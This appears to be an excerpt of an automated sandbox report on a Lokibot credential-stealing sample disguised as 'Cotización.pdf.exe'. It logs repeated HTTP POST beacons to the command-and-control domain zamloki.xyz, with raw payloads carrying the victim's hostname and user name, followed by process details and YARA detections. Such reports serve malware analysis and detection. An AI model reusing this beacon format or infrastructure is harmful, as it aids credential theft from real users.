                                    Date: Wed, 21 Jul 2021 15:02:39 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BozkAPYTjpL3DaQeN%2B79wX1m9F08zX%2FGTvbp6mF56Zs5iwwRsNOdZEnPQ9u%2F8oPu23e%2FqYB3uHdzU9wIsWEa2JL8JQrlM8b5Svwb9RF7DtYpIPJWwKsdNQWDObvzjQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254fc0cbf805f9-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    9 | 192.168.2.3 | 49737 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:01:52.982084036 CEST | 1294 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:01:52.999691963 CEST | 1294 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:01:53.262790918 CEST | 1295 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:01:53 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=T0Sh%2F9SdtCoAOrhmhKPGoxLDsizpj78%2FjofBS2BGCk0EnxPTNwpxtjRCFXcEtw416mXXn3oyeImeqDyhrNcFgWzNTHJqwW18Ph5YDBQC%2FlZmlCYCGKwCU%2BYuqhujFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254e9e3aa8c2fe-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    90 | 192.168.2.3 | 49827 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:39.966711998 CEST | 5630 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:39.987859964 CEST | 5630 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:40.240339994 CEST | 5631 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:40 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=oAbWSHzTthk%2B4Si4NS%2Fm14cv6q0ECuOSAh0IaUv15q2IQvFvQ8VoRZAnoynui69pddyfZT9yQvAGsJqO82r33MDPKPvipgxj4Vi87Y9e%2BVvdev2VJ1IpusJz1qy9aQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254fc3ec474a56-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    91 | 192.168.2.3 | 49828 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:40.433906078 CEST | 5632 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:40.451919079 CEST | 5633 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:40.738461971 CEST | 5633 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:40 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SBzZRs5%2BSLufkrXZlKDmc3amlFsQnGPpwQELRkOHD6%2FXUSKUkFlLwPQK9He%2FBi4gWDV8XXOBn19M6t%2FUZ%2BUmyXMwHmRYqqdcGD7tLQnKj2HTrCZFGa1vVpY2XZsBcg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254fc6ca2ce003-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    92 | 192.168.2.3 | 49829 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:40.967166901 CEST | 5634 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:40.987943888 CEST | 5635 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:41.346208096 CEST | 5640 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:41 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2F8NJg5dwAC82yBUOeDHJxDrt64tTL9awz4XM7ZK%2Bjz4U0BFaAipYj1VBOgh2RnmA4meMDix3oXd5uIGk%2F4ieARlvuTxNEx6Vg0OtUdqcDUV54fFalC5CKvtF6farYg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254fca1b6f1456-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    93 | 192.168.2.3 | 49831 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:41.554207087 CEST | 5642 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:41.576540947 CEST | 5644 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:41.827415943 CEST | 5646 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:41 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=wPYc%2BaTIrYu3XhL5rVEYzvS6oJTwHF%2BexV4ZG8ecaONuDtEuhnFv%2BCK%2FG31nEEPrBFvEmzBCjqtK3wJTLZoB2W05C3vcBHX86Fz4KqOuHyw7mZBHmylGsEOmmDocNw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254fcdcd494e80-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    94 | 192.168.2.3 | 49832 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:42.040060997 CEST | 5646 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:42.057975054 CEST | 5647 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:42.313322067 CEST | 5647 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:42 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZHE27GXzO6KgF9I0Rm%2BLgGODJFH1cL3nw9hN64xUSw7y6vclM9GAhrWFW%2B3Pnyn9SZX9Aardjj4a1YD%2BK%2Bh8q4u9NgaxcupD3nq6gFxZVbLSdLM%2Fn9r2sEnW%2FlUeig%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254fd0dc3a4dd0-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    95 | 192.168.2.3 | 49833 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:42.533368111 CEST | 5648 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:42.553056002 CEST | 5649 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:42.813016891 CEST | 5649 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:42 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kx3o6orfMpWVV5D7bEV3xlPS0y%2BD43OKiD7A%2BYg2fwhmMEljS4fLyanqvZGGtPdZae3yCmpJNfe7v9UeCFqP%2BgE3ei%2FpKEOoVbJXr60d4ihpHCJ3XZ0RVn5VJaLb4g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254fd3eaeabf0f-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    96 | 192.168.2.3 | 49834 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:43.028630972 CEST | 5650 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:43.048029900 CEST | 5651 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:43.310630083 CEST | 5651 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:43 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PSe3nVtOBiLABt59S1PPFesqg4lnowlNqAovdAr%2BXZzQoOHcWXyYuzlNY6CP3qSlJoJT%2B8kCqJYlGESs0QGoCopIpxylthBKV9Z9F%2BYwrU0%2Fy%2FMU7Mf5nvCKpbiuvg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254fd70f14073e-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    97 | 192.168.2.3 | 49836 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:43.538465023 CEST | 5655 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:43.556344032 CEST | 5656 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:43.846981049 CEST | 5662 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:43 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E13SV5HQkRvPUV3lLZo%2F8EkcVMF%2BAodFNSdYZOikwQARgwdPQ4dk5VOtmHQdqrQoNNYIAX%2BMzt5MAJ8%2BCKgiecemX00BBYP%2FP7b27%2FgZAgqUK%2B8gP8dE8bRkm%2FzX3Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254fda2f682c52-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    98 | 192.168.2.3 | 49837 | 104.21.6.222 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:44.281989098 CEST | 5663 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:44.301839113 CEST | 5664 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:44.606476068 CEST | 5664 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:44 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=w4960vf%2B7tS3hmPSKolUZ2tUfC2ZL9zO9cN5DX%2BuDFdBd65bXRSr4Pldf3R8qXolok5XbQU7c9ji0mjw3UCCMQAhmyBCAbz0v3c%2FaHhY6XHENUAfXMh5HtBWyWwh7A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254fdedf6b4e50-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                    99 | 192.168.2.3 | 49838 | 172.67.155.45 | 80 | C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Timestamp | kBytes transferred | Direction | Data
                                    Jul 21, 2021 17:02:44.910721064 CEST | 5665 | OUT | POST /des/co/tox.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: zamloki.xyz
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: A3C8092
                                    Content-Length: 163
                                    Connection: close
                                    Jul 21, 2021 17:02:44.928602934 CEST | 5665 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz367706DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Jul 21, 2021 17:02:45.186896086 CEST | 5666 | IN | HTTP/1.1 404 Not Found
                                    Date: Wed, 21 Jul 2021 15:02:45 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Connection: close
                                    Status: 404 Not Found
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cthWy9waWDmEcV05Z5%2BWqaPG%2FPPr2VPw%2F8B8NqHzleg1P1QrqsCssPD0AWXex51d1PrPG9KXAsTbeqeyjPcX4H32FQXmzOHqfhS4hlpAuGc7FevvGKb9gcXXixiJkg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 67254fe2ce512c3a-FRA
                                    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Code Manipulations

                                    System Behavior

                                    General

                                    Start time:17:01:03
                                    Start date:21/07/2021
                                    Path:C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Wow64 process (32bit):true
                                    Commandline:'C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe'
                                    Imagebase:0x7a0000
                                    File size:1104896 bytes
                                    MD5 hash:C3412FEE75B0F8758EA9905930EC2F34
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Yara matches:
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.288729980.0000000002D8C000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.288729980.0000000002D8C000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.288729980.0000000002D8C000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.288729980.0000000002D8C000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.290079691.0000000003E50000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.290079691.0000000003E50000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.290079691.0000000003E50000.00000004.00000001.sdmp, Author: Joe Security
                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.290079691.0000000003E50000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    General

                                    Start time:17:01:44
                                    Start date:21/07/2021
                                    Path:C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Wow64 process (32bit):false
                                    Commandline:{path}
                                    Imagebase:0x180000
                                    File size:1104896 bytes
                                    MD5 hash:C3412FEE75B0F8758EA9905930EC2F34
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low

                                    General

                                    Start time:17:01:44
                                    Start date:21/07/2021
                                    Path:C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                    Wow64 process (32bit):true
                                    Commandline:{path}
                                    Imagebase:0xc20000
                                    File size:1104896 bytes
                                    MD5 hash:C3412FEE75B0F8758EA9905930EC2F34
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                    • Rule: Loki_1, Description: Loki Payload, Source: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                    • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                    Reputation:low

                                    Disassembly

                                    Code Analysis

                                      Executed Functions

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID: J*K{
                                      • API String ID: 0-879598089
